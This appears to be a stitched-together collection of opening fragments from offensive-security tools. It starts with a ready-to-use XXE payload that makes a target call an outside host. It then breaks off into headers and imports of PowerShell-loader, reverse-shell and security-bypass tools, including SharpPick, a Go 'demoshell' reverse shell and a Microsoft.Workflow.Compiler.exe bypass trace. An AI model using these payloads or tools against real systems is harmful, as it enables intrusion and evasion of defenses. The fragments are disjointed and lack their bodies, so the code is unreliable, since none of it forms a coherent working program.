--------------------------------------------------------------
Vanilla, used to verify outbound XXE or blind XXE
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
# Ensure the System.Security assembly is loaded.
Add-Type -AssemblyName System.Security
function ConvertTo-CIPolicy {
<#
.SYNOPSIS
Converts a binary file that contains a Code Integrity policy into XML format.
Author: Matthew Graeber (@mattifestation)
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
from argparse import ArgumentParser
from subprocess import Popen, PIPE
from hashlib import sha1
from os import path, walk
import re
import os
from sys import stderr
def extension_dir():
/*
 * SharpPick aka InexorablePoSH
 * Description: Application to load and run PowerShell code via the .NET assemblies
 * License: 3-Clause BSD License. See Veil PowerTools Project
 *
 * This application is part of Veil PowerTools, a collection of offensive PowerShell
 * capabilities. Hope they help!
 *
 * This is part of a sub-repo of PowerPick, a toolkit used to run PowerShell code without the use of Powershell.exe
 */
/*
 * SharpPick aka InexorablePoSH
 * Description: Application to load and run PowerShell code via the .NET assemblies
 * License: 3-Clause BSD License. See Veil PowerTools Project
 *
 * This application is part of Veil PowerTools, a collection of offensive PowerShell
 * capabilities. Hope they help!
 *
 * This is part of a sub-repo of PowerPick, a toolkit used to run PowerShell code without the use of Powershell.exe
 */
<#
The purpose of this script is to attempt to set off alarms on security products.
#>
function Get-RandomString {
# Get-RandomString.ps1
# Written by Bill Stewart (bstewart@iname.com)
#requires -version 2
// demoshell is a nifty beaconing shell useful for demos
package main
/*
 * demoshell.go
 * Simple reverse shell used in demos
 * By J. Stuart McMurray
 * Created 20180331
 * Last Modified 20180331
 */
logman --% start dotNetTrace -p Microsoft-Windows-DotNETRuntime (JitKeyword,NGenKeyword,InteropKeyword,LoaderKeyword) win:Informational -o dotNetTrace.etl -ets
# Do your evil .NET thing now. In this example, I executed the Microsoft.Workflow.Compiler.exe bypass
# logman stop dotNetTrace -ets
# This is the process ID of the process I want to capture. In this case, Microsoft.Workflow.Compiler.exe
# I got the process ID by running a procmon trace
$TargetProcessId = 8256
package main
import (
	"bytes"
	"fmt"
	"os/exec"
	"strings"
)
// PowerShell struct